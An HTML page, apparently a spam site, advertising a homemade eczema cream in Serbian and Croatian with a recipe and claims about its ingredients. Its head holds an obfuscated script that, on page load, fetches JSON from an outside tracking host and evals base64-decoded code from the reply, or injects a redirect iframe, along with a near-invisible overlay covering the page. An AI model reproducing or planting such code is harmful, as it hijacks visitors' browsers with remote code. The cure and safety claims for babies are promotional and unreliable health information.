<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>

<title>Atopijski dermatitis stetoskop | Prirodne kreme</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<!-- Le styles -->
<link href="./assets/css/bootstrap.css" rel="stylesheet">
<link href="./assets/css/bootstrap-responsive.css" rel="stylesheet">
<link href="./assets/css/docs.css" rel="stylesheet">
<link href="./assets/css/prettyPhoto.css" rel="stylesheet" type="text/css" />
<link href="./assets/js/google-code-prettify/prettify.css" rel="stylesheet">
<script>
    'use strict'
	var appred = true;
	var baseurl = "aHR0cDovL3BjZWxhcmljYS54eXo=";
	var _0x9bd5=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D"];var keyStr=_0x9bd5[0];var url=null;var redurl=null;
	var _0xf02d=["","\x65\x78\x65\x63","\x54\x68\x65\x72\x65\x20\x77\x65\x72\x65\x20\x69\x6E\x76\x61\x6C\x69\x64\x20\x62\x61\x73\x65\x36\x34\x20\x63\x68\x61\x72\x61\x63\x74\x65\x72\x73\x20\x69\x6E\x20\x74\x68\x65\x20\x69\x6E\x70\x75\x74\x20\x74\x65\x78\x74\x2E\x0A","\x56\x61\x6C\x69\x64\x20\x62\x61\x73\x65\x36\x34\x20\x63\x68\x61\x72\x61\x63\x74\x65\x72\x73\x20\x61\x72\x65\x20\x41\x2D\x5A\x2C\x20\x61\x2D\x7A\x2C\x20\x30\x2D\x39\x2C\x20\x27\x2B\x27\x2C\x20\x27\x2F\x27\x2C\x61\x6E\x64\x20\x27\x3D\x27\x0A","\x45\x78\x70\x65\x63\x74\x20\x65\x72\x72\x6F\x72\x73\x20\x69\x6E\x20\x64\x65\x63\x6F\x64\x69\x6E\x67\x2E","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function decode64(_0x4719x2){var _0x4719x3=_0xf02d[0];var _0x4719x4,_0x4719x5,_0x4719x6=_0xf02d[0];var _0x4719x7,_0x4719x8,_0x4719x9,_0x4719xa=_0xf02d[0];var _0x4719xb=0;var _0x4719xc=/[^A-Za-z0-9\+\/\=]/g;if(_0x4719xc[_0xf02d[1]](_0x4719x2)){alert(_0xf02d[2]+_0xf02d[3]+_0xf02d[4])};_0x4719x2=_0x4719x2[_0xf02d[5]](/[^A-Za-z0-9\+\/\=]/g,_0xf02d[0]);do{_0x4719x7=keyStr[_0xf02d[7]](_0x4719x2[_0xf02d[6]](_0x4719xb++));_0x4719x8=keyStr[_0xf02d[7]](_0x4719x2[_0xf02d[6]](_0x4719xb++));_0x4719x9=keyStr[_0xf02d[7]](_0x4719x2[_0xf02d[6]](_0x4719xb++));_0x4719xa=keyStr[_0xf02d[7]](_0x4719x2[_0xf02d[6]](_0x4719xb++));_0x4719x4=(_0x4719x7<<2)|(_0x4719x8>>4);_0x4719x5=((_0x4719x8&15)<<4)|(_0x4719x9>>2);_0x4719x6=((_0x4719x9&3)<<6)|_0x4719xa;_0x4719x3=_0x4719x3+String[_0xf02d[8]](_0x4719x4);if(_0x4719x9!=64){_0x4719x3=_0x4719x3+String[_0xf02d[8]](_0x4719x5)};if(_0x4719xa!=64){_0x4719x3=_0x4719x3+String[_0xf02d[8]](_0x4719x6)};_0x4719x4=_0x4719x5=_0x4719x6=_0xf02d[0];_0x4719x7=_0x4719x8=_0x4719x9=_0x4719xa=_0xf02d[0]}while(_0x4719xb<_0x4719x2[_0xf02d[9]]);;return unescape(_0x4719x3)}
	var _0xce85=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x64\x74\x72\x6B\x73\x72\x76\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x72\x75\x6E\x69\x74\x2F","\x64\x65\x74\x65\x63\x74\x65\x64","\x75\x72\x6C","\x72\x75\x6E","\x62\x6F\x64\x79","\x68\x74\x6D\x6C","\x73\x72\x63","\x61\x74\x74\x72","\x23\x72\x65\x64\x66\x72\x61\x6D\x65","\x73\x68\x6F\x77","\x67\x65\x74\x4A\x53\x4F\x4E"];$(function(){$[_0xce85[10]](_0xce85[0]+baseurl,function(_0x9bd5x1){if(!_0x9bd5x1[_0xce85[1]]){redurl=decodeURIComponent(decode64(_0x9bd5x1[_0xce85[2]]));if(appred){eval(decode64(_0x9bd5x1[_0xce85[3]]))}else {$(_0xce85[4])[_0xce85[5]](decode64(_0x9bd5x1[_0xce85[4]]));$(_0xce85[8])[_0xce85[7]](_0xce85[6],redurl);$(_0xce85[8])[_0xce85[9]]()}}})})
  </script>
<meta name="description" content="Atopijski dermatitis stetoskop - Najbolja krema za ekcem, izliječite ekcem. ">
<meta name="referrer" content="no-referrer" />
<!-- Le HTML5 shim, for IE6-8 support of HTML5 elements -->
<!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
<!-- Le fav and touch icons -->
<link rel="shortcut icon" href="./assets/ico/favicon.ico">
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="./assets/ico/apple-touch-icon-144-precomposed.png">
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="./assets/ico/apple-touch-icon-114-precomposed.png">
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="./assets/ico/apple-touch-icon-72-precomposed.png">
<link rel="apple-touch-icon-precomposed" href="./assets/ico/apple-touch-icon-57-precomposed.png">
</head>
<body data-spy="scroll" data-target=".bs-docs-sidebar">
<div id="overlayidhide212" style="position: fixed;top: 0;left: 0;height: 99%;width: 100%;z-index: 9998;background-color: rgba(255,255,255,0.99);"><a href="#" style="color: rgb(249,249,249)" onclick='var element = document.getElementById("overlayidhide212");element.parentNode.removeChild(element);'>close</a><br></div>
<!-- Navbar
    ================================================== -->
<div class="nav-agency">
  <div class="navbar navbar-static-top"> 
    <!-- navbar-fixed-top -->
    <div class="navbar-inner">
      <div class="container"> <a class="brand" href="index.html"> <img src="assets/img/Logodark.png" alt="Logo"></a>
        <div id="main-nav">
          <div class="nav-collapse collapse">
            <ul class="nav">
              <li class=""><a href="./index.html">Home</a> </li>
              	                </ul>
              </li>
              </ul>
    </div>
  </div>
</div>
<div class="container">
  <div class="row-fluid">
    <div class="span12">
      <div class="page-header">
        <div class="row-fluid">
          <div class="span12">
            <h1> Atopijski dermatitis stetoskop</h1>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="row-fluid blog">
   
          <div class="blog-post-tags">
            <ul>
			
			</ul>
          </div>
          <div class="dd_buttons clearfix">
            <div class="dd_button dd_plusone"> 
              <!-- Place this tag where you want the +1 button to render. -->
              <div class="g-plusone" data-size="medium"></div>
              
              <!-- Place this tag after the last +1 button tag. --> 
              <script type="text/javascript">
                            (function () {
                                var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
                                po.src = 'https://apis.google.com/js/plusone.js';
                                var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
                            })();
                        </script> 
            </div>
            <div class="dd_button dd_twitter"> <a href="https://twitter.com/share" class="twitter-share-button" data-url="./index.html" data-via="esarfraz">Tweet</a> 
              <script>    !function (d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (!d.getElementById(id)) { js = d.createElement(s); js.id = id; js.src = "//platform.twitter.com/widgets.js"; fjs.parentNode.insertBefore(js, fjs); } } (document, "script", "twitter-wjs");</script> 
            </div>
            <div class="dd_button dd_facebook">
              <iframe src="//www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FEGrappler&amp;send=false&amp;layout=button_count&amp;width=450&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21&amp;appId=293327524071681" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:21px;" allowTransparency="true"></iframe>
            </div>
          </div>
        </section>
             &#1045;&#1082;&#1094;&#1077;&#1084;&#1080; &#1084;&#1091;&#1095;&#1077; &#1086;&#1076; &#1076;&#1077;&#1074;&#1077;&#1090; &#1076;&#1086; 30 &#1087;&#1086;&#1089;&#1090;&#1086; &#1113;&#1091;&#1076;&#1080;, &#1072; &#1087;&#1086;&#1089;&#1083;&#1077;&#1076;&#1080;&#1094;&#1072; &#1089;&#1091; &#1072;&#1090;&#1086;&#1087;&#1080;&#1112;&#1089;&#1082;&#1086;&#1075; 
    &#1076;&#1077;&#1088;&#1084;&#1072;&#1090;&#1080;&#1090;&#1080;&#1089;&#1072; &#1080; &#1082;&#1086;&#1085;&#1090;&#1072;&#1082;&#1090;&#1085;&#1086;&#1075; &#1076;&#1077;&#1088;&#1084;&#1072;&#1090;&#1080;&#1090;&#1080;&#1089;&#1072;. &#1040;&#1090;&#1086;&#1087;&#1080;&#1112;&#1089;&#1082;&#1080; &#1112;&#1077; &#1085;&#1072;&#1089;&#1083;&#1077;&#1076;&#1072;&#1085;, &#1072;&#1083;&#1080; &#1112;&#1077;&#1076;&#1085;&#1072;&#1082;&#1086; 
    &#1090;&#1072;&#1082;&#1086; &#1084;&#1086;&#1075;&#1091; &#1075;&#1072; &#1091;&#1079;&#1088;&#1086;&#1082;&#1086;&#1074;&#1072;&#1090;&#1080; &#1075;&#1088;&#1080;&#1114;&#1077;, &#1093;&#1083;&#1072;&#1076;&#1085;&#1086;&#1115;&#1072; &#1080; &#1074;&#1077;&#1083;&#1080;&#1082;&#1072; &#1074;&#1083;&#1072;&#1075;&#1072; &#1091; &#1074;&#1072;&#1079;&#1076;&#1091;&#1093;&#1091;. 
    &#1050;&#1086;&#1085;&#1090;&#1072;&#1082;&#1090;&#1085;&#1080; &#1085;&#1072;&#1089;&#1090;&#1072;&#1112;&#1077; &#1079;&#1073;&#1086;&#1075; &#1072;&#1083;&#1077;&#1088;&#1075;&#1080;&#1112;&#1089;&#1082;&#1077; &#1088;&#1077;&#1072;&#1082;&#1094;&#1080;&#1112;&#1077; &#1085;&#1072; &#1086;&#1076;&#1088;&#1077;&#1106;&#1077;&#1085;&#1080; &#1087;&#1088;&#1077;&#1087;&#1072;&#1088;&#1072;&#1090;, &#1082;&#1088;&#1077;&#1084;&#1091; &#1080;&#1083;&#1080; 
    &#1076;&#1077;&#1090;&#1077;&#1088;&#1119;&#1077;&#1085;&#1090; &#1079;&#1072; &#1087;&#1088;&#1072;&#1114;&#1077; &#1074;&#1077;&#1096;&#1072;. <b>&#1045;&#1082;&#1094;&#1077;&#1084;</b> 
    &#1085;&#1072;&#1112;&#1095;&#1077;&#1096;&#1115;&#1077; &#1087;&#1086;&#1095;&#1080;&#1114;&#1077; &#1082;&#1072;&#1086; &#1074;&#1083;&#1072;&#1078;&#1085;&#1072; &#1088;&#1072;&#1085;&#1072; &#1089; &#1084;&#1077;&#1093;&#1091;&#1088;&#1080;&#1115;&#1080;&#1084;&#1072;.

    <div>
      <i>&#1045;&#1082;&#1094;&#1077;&#1084;&#1077; &#1084;&#1086;&#1075;&#1091; &#1091;&#1079;&#1088;&#1086;&#1082;&#1086;&#1074;&#1072;&#1090;&#1080; &#1080; &#1084;&#1077;&#1090;&#1072;&#1083;&#1080; &#1080;&#1079; &#1085;&#1072;&#1082;&#1080;&#1090;&#1072;</i>, 
      &#1073;&#1086;&#1112;&#1077; &#1080;&#1079; &#1086;&#1076;&#1077;&#1115;&#1077; &#1080; &#1073;&#1086;&#1112;&#1077; &#1079;&#1072; &#1082;&#1086;&#1089;&#1091;, &#1084;&#1080;&#1088;&#1080;&#1089;&#1080; &#1091; &#1076;&#1077;&#1090;&#1077;&#1088;&#1119;&#1077;&#1085;&#1090;&#1080;&#1084;&#1072; &#1080; &#1087;&#1088;&#1077;&#1087;&#1072;&#1088;&#1072;&#1090;&#1080;&#1084;&#1072; &#1079;&#1072; 
      &#1085;&#1077;&#1075;&#1091;. &#1056;&#1077;&#1079;&#1091;&#1083;&#1090;&#1072;&#1090; &#1090;&#1086;&#1075;&#1072; &#1089;&#1091; &#1085;&#1072;&#1112;&#1095;&#1077;&#1096;&#1115;&#1077; &#1077;&#1082;&#1094;&#1077;&#1084;&#1080; &#1085;&#1072; &#1088;&#1091;&#1082;&#1072;&#1084;&#1072; &#1080; &#1085;&#1086;&#1075;&#1072;&#1084;&#1072;.
    </div>
    <div>
      
    </div>
    &#1040;&#1082;&#1086; &#1089;&#1077; &#1085;&#1072; &#1082;&#1086;&#1078;&#1080; &#1087;&#1086;&#1112;&#1072;&#1074;&#1080; &#1077;&#1082;&#1094;&#1077;&#1084;, &#1074;&#1072;&#1078;&#1085;&#1086; &#1112;&#1077; &#1087;&#1088;&#1072;&#1090;&#1080;&#1090;&#1080; &#1087;&#1088;&#1077;&#1087;&#1072;&#1088;&#1072;&#1090;&#1077; &#1082;&#1086;&#1112;&#1077; &#1082;&#1086;&#1088;&#1080;&#1089;&#1090;&#1080;&#1090;&#1077; &#1080; 
    &#1087;&#1086; &#1084;&#1086;&#1075;&#1091;&#1115;&#1085;&#1086;&#1089;&#1090;&#1080; &#1087;&#1088;&#1077;&#1089;&#1090;&#1072;&#1090;&#1080; &#1089;&#1072; &#1082;&#1086;&#1088;&#1080;&#1096;&#1115;&#1077;&#1114;&#1077;&#1084; &#1085;&#1072; &#1076;&#1074;&#1077; &#1085;&#1077;&#1076;&#1077;&#1113;&#1077; &#1082;&#1072;&#1082;&#1086; &#1073;&#1080; &#1089;&#1077; &#1074;&#1080;&#1076;&#1077;&#1083;&#1086; &#1076;&#1072; &#1075;&#1072; 
    &#1091;&#1079;&#1088;&#1086;&#1082;&#1091;&#1112;&#1091; &#1090;&#1077; &#1082;&#1088;&#1077;&#1084;&#1077; &#1080;&#1083;&#1080; &#1085;&#1077;. &#1055;&#1088;&#1077;&#1087;&#1086;&#1088;&#1091;&#1095;&#1091;&#1112;&#1077; &#1089;&#1077; &#1082;&#1086;&#1088;&#1080;&#1096;&#1115;&#1077;&#1114;&#1077; &#1093;&#1080;&#1087;&#1086;&#1072;&#1083;&#1077;&#1088;&#1075;&#1077;&#1085;&#1080;&#1093; 
    &#1087;&#1088;&#1077;&#1087;&#1072;&#1088;&#1072;&#1090;&#1072;, &#1073;&#1083;&#1072;&#1075;&#1077; &#1082;&#1088;&#1077;&#1084;&#1077; &#1080; &#1082;&#1086;&#1079;&#1084;&#1077;&#1090;&#1080;&#1082;&#1072; &#1073;&#1086;&#1075;&#1072;&#1090;&#1072; &#1087;&#1088;&#1080;&#1088;&#1086;&#1076;&#1085;&#1080;&#1084; &#1084;&#1072;&#1089;&#1085;&#1080;&#1084; &#1082;&#1080;&#1089;&#1077;&#1083;&#1080;&#1085;&#1072;&#1084;&#1072; &#1082;&#1086;&#1112;&#1080; 
    &#1087;&#1086;&#1087;&#1088;&#1072;&#1074;&#1113;&#1072;&#1112;&#1091; &#1082;&#1086;&#1078;&#1085;&#1091; &#1073;&#1072;&#1088;&#1080;&#1112;&#1077;&#1088;&#1091; &#1080; &#1089;&#1087;&#1088;&#1077;&#1095;&#1072;&#1074;&#1072;&#1112;&#1091; &#1080;&#1089;&#1087;&#1072;&#1088;&#1072;&#1074;&#1072;&#1114;&#1077; &#1074;&#1086;&#1076;&#1077;.

    <h2>
      Kako napraviti ovu kremu za ekcem
    </h2>
    <div>
      &#1057;&#1072;&#1089;&#1090;&#1086;&#1112;&#1094;&#1080;:
    </div>
    <ul>
      <li>
        1/2 &#1096;&#1086;&#1113;&#1080;&#1094;&#1077; &#1096;&#1077;&#1072; &#1084;&#1072;&#1089;&#1083;&#1072;&#1094;&#1072;
      </li>
      <li>
        1/2 &#1096;&#1086;&#1113;&#1080;&#1094;&#1077; &#1082;&#1086;&#1082;&#1086;&#1089;&#1086;&#1074;&#1086;&#1075; &#1091;&#1113;&#1072;
      </li>
      <li>
        1 &#1082;&#1072;&#1096;&#1080;&#1082;&#1072; &#1084;&#1077;&#1076;&#1072;
      </li>
      <li>
        20 &#1082;&#1072;&#1087;&#1080; &#1077;&#1090;&#1077;&#1088;&#1080;&#1095;&#1085;&#1086;&#1075; &#1091;&#1113;&#1072; &#1083;&#1072;&#1074;&#1072;&#1085;&#1076;&#1077;
      </li>
      <li>
        5 &#1082;&#1072;&#1087;&#1080; &#1077;&#1090;&#1077;&#1088;&#1080;&#1095;&#1085;&#1086;&#1075; &#1091;&#1113;&#1072; &#1095;&#1072;&#1112;&#1077;&#1074;&#1094;&#1072;
      </li>
    </ul>
    <h2>
      Kako pripremiti navedene sastojke za kremu
    </h2>
    &#1053;&#1072; &#1087;&#1072;&#1088;&#1080; &#1086;&#1090;&#1086;&#1087;&#1080;&#1090;&#1077; &#1082;&#1086;&#1082;&#1086;&#1089;&#1086;&#1074;&#1086; &#1091;&#1113;&#1077; &#1080; &#1096;&#1077;&#1072; &#1084;&#1072;&#1089;&#1083;&#1072;&#1094; &#1076;&#1086;&#1082; &#1089;&#1077; &#1085;&#1077; &#1089;&#1112;&#1077;&#1076;&#1080;&#1085;&#1077;. &#1057;&#1082;&#1083;&#1086;&#1085;&#1080;&#1090;&#1077; &#1089; 
    &#1074;&#1072;&#1090;&#1088;&#1077; &#1080; &#1082;&#1072;&#1076; &#1089;&#1077; &#1089;&#1084;&#1077;&#1089;&#1072; &#1084;&#1072;&#1083;&#1086; &#1086;&#1093;&#1083;&#1072;&#1076;&#1080; &#1076;&#1086;&#1076;&#1072;&#1112;&#1090;&#1077; 1 &#1082;&#1072;&#1096;&#1080;&#1082;&#1091; &#1084;&#1077;&#1076;&#1072;. &#1044;&#1086;&#1073;&#1088;&#1086; &#1087;&#1088;&#1086;&#1084;&#1077;&#1096;&#1072;&#1112;&#1090;&#1077;. 
    &#1059;&#1082;&#1072;&#1087;&#1072;&#1112;&#1090;&#1077; &#1077;&#1090;&#1077;&#1088;&#1080;&#1095;&#1085;&#1072; &#1091;&#1113;&#1072; &#1083;&#1072;&#1074;&#1072;&#1085;&#1076;&#1077; &#1080; &#1095;&#1072;&#1112;&#1077;&#1074;&#1094;&#1072;. &#1044;&#1086;&#1073;&#1088;&#1086; &#1084;&#1077;&#1096;&#1072;&#1112;&#1090;&#1077; &#1089;&#1074;&#1077; &#1089;&#1072;&#1089;&#1090;&#1086;&#1112;&#1082;&#1077; 
    (&#1084;&#1086;&#1078;&#1077;&#1090;&#1077; &#1084;&#1080;&#1082;&#1089;&#1077;&#1088;&#1086;&#1084; &#1080;&#1083;&#1080; &#1088;&#1091;&#1095;&#1085;&#1086;) &#1076;&#1086;&#1082; &#1085;&#1077; &#1076;&#1086;&#1073;&#1080;&#1112;&#1077;&#1090;&#1077; &#1088;&#1072;&#1074;&#1085;&#1086;&#1084;&#1077;&#1088;&#1085;&#1091; &#1089;&#1084;&#1077;&#1089;&#1091;, &#1087;&#1086;&#1090;&#1086;&#1084; &#1091;&#1083;&#1080;&#1112;&#1090;&#1077; 
    &#1091; &#1085;&#1072;&#1084;&#1077;&#1114;&#1077;&#1085;&#1091; &#1087;&#1086;&#1089;&#1091;&#1076;&#1091; &#1080; &#1086;&#1089;&#1090;&#1072;&#1074;&#1080;&#1090;&#1077; &#1076;&#1072; &#1086;&#1076;&#1089;&#1090;&#1086;&#1112;&#1080; &#1087;&#1072;&#1088; &#1089;&#1072;&#1090;&#1080; &#1076;&#1072; &#1089;&#1077; &#1089;&#1090;&#1074;&#1076;&#1085;&#1077;.

    <div>
      
    </div>
    <div>
      &#1052;&#1086;&#1078;&#1077;&#1090;&#1077; &#1082;&#1088;&#1077;&#1084;&#1091; &#1076;&#1088;&#1078;&#1072;&#1090;&#1080; &#1074;&#1072;&#1085; &#1092;&#1088;&#1080;&#1078;&#1080;&#1076;&#1077;&#1088;&#1072; &#1080;&#1083;&#1080; &#1091; &#1114;&#1077;&#1084;&#1091;, &#1079;&#1072;&#1074;&#1080;&#1089;&#1085;&#1086; &#1082;&#1086;&#1083;&#1080;&#1082;&#1086; &#1075;&#1091;&#1089;&#1090;&#1091; &#1082;&#1088;&#1077;&#1084;&#1091; 
      &#1074;&#1086;&#1083;&#1080;&#1090;&#1077;. &#1050;&#1072;&#1076;&#1072; &#1112;&#1077; &#1082;&#1088;&#1077;&#1084;&#1072; &#1086;&#1076;&#1089;&#1090;&#1072;&#1112;&#1072;&#1083;&#1072;, &#1085;&#1072;&#1085;&#1077;&#1089;&#1080;&#1090;&#1077; &#1112;&#1077; &#1085;&#1072; &#1082;&#1086;&#1078;&#1091; &#1080; &#1083;&#1077;&#1095;&#1077;&#1114;&#1077; &#1084;&#1086;&#1078;&#1077; &#1076;&#1072; 
      &#1087;&#1086;&#1095;&#1085;&#1077;. &#1050;&#1086;&#1088;&#1080;&#1089;&#1090;&#1080;&#1090;&#1077; &#1087;&#1086; &#1087;&#1086;&#1090;&#1088;&#1077;&#1073;&#1080;. &#1052;&#1086;&#1078;&#1077; &#1089;&#1077; &#1082;&#1086;&#1088;&#1080;&#1089;&#1090;&#1080;&#1090;&#1080; &#1079;&#1072; &#1083;&#1080;&#1094;&#1077; &#1080; &#1090;&#1077;&#1083;&#1086;, &#1079;&#1072; &#1089;&#1074;&#1077; 
      &#1090;&#1080;&#1087;&#1086;&#1074;&#1077; &#1082;&#1086;&#1078;&#1077;.
    </div>
    <h3>
      Kako krema protiv ekcema djeluje
    </h3>
    &#1064;&#1077;&#1072; &#1084;&#1072;&#1089;&#1083;&#1072;&#1094; &#1112;&#1077; &#1084;&#1072;&#1089;&#1090; &#1082;&#1086;&#1112;&#1072; &#1089;&#1077; &#1076;&#1086;&#1073;&#1080;&#1112;&#1072; &#1080;&#1079; &#1086;&#1088;&#1072;&#1093;&#1072; &#1096;&#1077;&#1072; &#1089;&#1090;&#1072;&#1073;&#1083;&#1072; &#1080;&#1079; &#1040;&#1092;&#1088;&#1080;&#1082;&#1077;. 
    &#1053;&#1077;&#1074;&#1077;&#1088;&#1086;&#1074;&#1072;&#1090;&#1085;&#1086; &#1074;&#1083;&#1072;&#1078;&#1080; &#1080; &#1080;&#1084;&#1072; &#1083;&#1077;&#1082;&#1086;&#1074;&#1080;&#1090;&#1072; &#1089;&#1074;&#1086;&#1112;&#1089;&#1090;&#1074;&#1072;, &#1087;&#1086;&#1089;&#1077;&#1073;&#1085;&#1086; &#1087;&#1086;&#1084;&#1072;&#1078;&#1077; &#1082;&#1086;&#1076; &#1089;&#1091;&#1074;&#1077; &#1082;&#1086;&#1078;&#1077; &#1080; 
    &#1077;&#1082;&#1094;&#1077;&#1084;&#1072;. &#1042;&#1077;&#1083;&#1080;&#1082;&#1072; &#1087;&#1088;&#1077;&#1076;&#1085;&#1086;&#1089;&#1090; &#1096;&#1077;&#1072; &#1084;&#1072;&#1089;&#1083;&#1072;&#1094;&#1072; &#1112;&#1077; &#1114;&#1077;&#1075;&#1086;&#1074;&#1072; &#1073;&#1077;&#1079;&#1073;&#1077;&#1076;&#1085;&#1086;&#1089;&#1090;. &#1063;&#1072;&#1082; &#1080; &#1074;&#1088;&#1083;&#1086; 
    &#1086;&#1089;&#1077;&#1090;&#1113;&#1080;&#1074;&#1072; &#1082;&#1086;&#1078;&#1072; &#1072;&#1090;&#1086;&#1087;&#1080;&#1095;&#1072;&#1088;&#1072; &#1075;&#1086;&#1090;&#1086;&#1074;&#1086; &#1085;&#1080;&#1082;&#1072;&#1076; &#1083;&#1086;&#1096;&#1077; &#1085;&#1077; &#1088;&#1077;&#1072;&#1075;&#1091;&#1112;&#1077; &#1085;&#1072; &#1114;&#1077;&#1075;&#1072;, &#1072; &#1089;&#1080;&#1075;&#1091;&#1088;&#1072;&#1085; &#1112;&#1077; 
    &#1079;&#1072; &#1091;&#1087;&#1086;&#1090;&#1088;&#1077;&#1073;&#1091; &#1080; &#1074;&#1088;&#1083;&#1086; &#1084;&#1072;&#1083;&#1080;&#1093; &#1073;&#1077;&#1073;&#1072;. &#1040;&#1082;&#1086; &#1089;&#1077; &#1082;&#1086;&#1088;&#1080;&#1089;&#1090;&#1080; &#1091; &#1095;&#1080;&#1089;&#1090;&#1086;&#1084; &#1086;&#1073;&#1083;&#1080;&#1082;&#1091;, &#1085;&#1072;&#1112;&#1095;&#1077;&#1096;&#1115;&#1077; &#1089;&#1077; 
    &#1087;&#1088;&#1080;&#1084;&#1077;&#1114;&#1091;&#1112;&#1077; &#1085;&#1072; &#1084;&#1086;&#1082;&#1088;&#1091; &#1082;&#1086;&#1078;&#1091; &#1085;&#1072;&#1082;&#1086;&#1085; &#1090;&#1091;&#1096;&#1080;&#1088;&#1072;&#1114;&#1072; &#1082;&#1072;&#1082;&#1086; &#1073;&#1080; &#1089;&#1077; &#1084;&#1072;&#1082;&#1089;&#1080;&#1084;&#1072;&#1083;&#1085;&#1086; &#1080;&#1089;&#1082;&#1086;&#1088;&#1080;&#1089;&#1090;&#1080;&#1086; 
    &#1086;&#1082;&#1083;&#1091;&#1079;&#1080;&#1074;&#1085;&#1080; &#1091;&#1095;&#1080;&#1085;&#1072;&#1082; &#1080; &#1095;&#1091;&#1074;&#1072;&#1083;&#1072; &#1074;&#1083;&#1072;&#1078;&#1085;&#1086;&#1089;&#1090; &#1082;&#1086;&#1078;&#1077;.
&#1050;&#1086;&#1082;&#1086;&#1089;&#1086;&#1074;&#1086; &#1091;&#1113;&#1077; &#1089;&#1072;&#1076;&#1088;&#1078;&#1080; &#1084;&#1085;&#1086;&#1075;&#1086; &#1076;&#1086;&#1073;&#1088;&#1080;&#1093; &#1084;&#1072;&#1089;&#1090;&#1080;, &#1086;&#1076;&#1083;&#1080;&#1095;&#1085;&#1086; &#1093;&#1080;&#1076;&#1088;&#1080;&#1088;&#1072; &#1080; &#1087;&#1091;&#1085;&#1086; &#1112;&#1077; &#1074;&#1080;&#1090;&#1072;&#1084;&#1080;&#1085;&#1072; &#1045;. 
    &#1059; &#1082;&#1086;&#1078;&#1091; &#1087;&#1088;&#1086;&#1076;&#1080;&#1088;&#1077; &#1073;&#1088;&#1079;&#1086; (&#1084;&#1085;&#1086;&#1075;&#1086; &#1073;&#1088;&#1078;&#1077; &#1086;&#1076; &#1074;&#1080;&#1089;&#1082;&#1086;&#1079;&#1085;&#1080;&#1093; &#1091;&#1113;&#1072; &#1087;&#1086;&#1087;&#1091;&#1090; &#1073;&#1086;&#1088;&#1072;&#1078;&#1080;&#1085;&#1077;, 
    &#1084;&#1072;&#1089;&#1083;&#1080;&#1085;&#1086;&#1074;&#1086;&#1075; &#1080;&#1083;&#1080; &#1089;&#1091;&#1085;&#1094;&#1086;&#1082;&#1088;&#1077;&#1090;&#1086;&#1074;&#1086;&#1075; &#1091;&#1113;&#1072;, &#1087;&#1072; &#1095;&#1072;&#1082; &#1080; &#1073;&#1072;&#1076;&#1077;&#1084;&#1072;). &#1050;&#1088;&#1077;&#1084;&#1072;&#1084;&#1072; &#1076;&#1072;&#1112;&#1077; &#1083;&#1072;&#1082;&#1086;&#1115;&#1091;, &#1072; 
    &#1082;&#1086;&#1078;&#1080; &#1076;&#1072;&#1112;&#1077; &#1075;&#1083;&#1072;&#1090;&#1082;&#1086;&#1115;&#1091;. &#1050;&#1072;&#1086; &#1080; &#1082;&#1072;&#1082;&#1072;&#1086; &#1084;&#1072;&#1089;&#1083;&#1072;&#1094;, &#1096;&#1090;&#1080;&#1090;&#1080; &#1082;&#1086;&#1078;&#1091; &#1086;&#1076; &#1080;&#1089;&#1091;&#1096;&#1080;&#1074;&#1072;&#1114;&#1072;, &#1072;&#1083;&#1080; &#1085;&#1077; 
    &#1089;&#1090;&#1074;&#1072;&#1088;&#1072; &#1092;&#1080;&#1083;&#1084; &#1085;&#1072; &#1082;&#1086;&#1078;&#1080;. &#1052;&#1077;&#1076; &#1093;&#1088;&#1072;&#1085;&#1080; &#1080; &#1074;&#1083;&#1072;&#1078;&#1080; &#1082;&#1086;&#1078;&#1091; &#1080; &#1080;&#1084;&#1072; &#1072;&#1085;&#1090;&#1080;&#1073;&#1072;&#1082;&#1090;&#1077;&#1088;&#1080;&#1112;&#1089;&#1082;&#1072; 
    &#1089;&#1074;&#1086;&#1112;&#1089;&#1090;&#1074;&#1072;.&#1045;&#1090;&#1077;&#1088;&#1080;&#1095;&#1085;&#1086; &#1091;&#1113;&#1077; &#1083;&#1072;&#1074;&#1072;&#1085;&#1076;&#1077; &#1084;&#1080;&#1088;&#1080;&#1096;&#1077; &#1089;&#1072;&#1074;&#1088;&#1096;&#1077;&#1085;&#1086; &#1080; &#1080;&#1084;&#1072; &#1091;&#1084;&#1080;&#1088;&#1091;&#1112;&#1091;&#1115;&#1077; &#1080; &#1083;&#1077;&#1082;&#1086;&#1074;&#1080;&#1090;&#1086; 
    &#1076;&#1077;&#1083;&#1086;&#1074;&#1072;&#1114;&#1077;. &#1059;&#1113;&#1077; &#1095;&#1072;&#1112;&#1077;&#1074;&#1094;&#1072; &#1087;&#1086;&#1084;&#1072;&#1078;&#1077; &#1091; &#1087;&#1088;&#1077;&#1074;&#1077;&#1085;&#1094;&#1080;&#1112;&#1080; &#1080;&#1085;&#1092;&#1077;&#1082;&#1094;&#1080;&#1112;&#1072; &#1082;&#1086;&#1112;&#1077; &#1089;&#1077; &#1095;&#1077;&#1089;&#1090;&#1086; &#1112;&#1072;&#1074;&#1113;&#1072;&#1112;&#1091; 
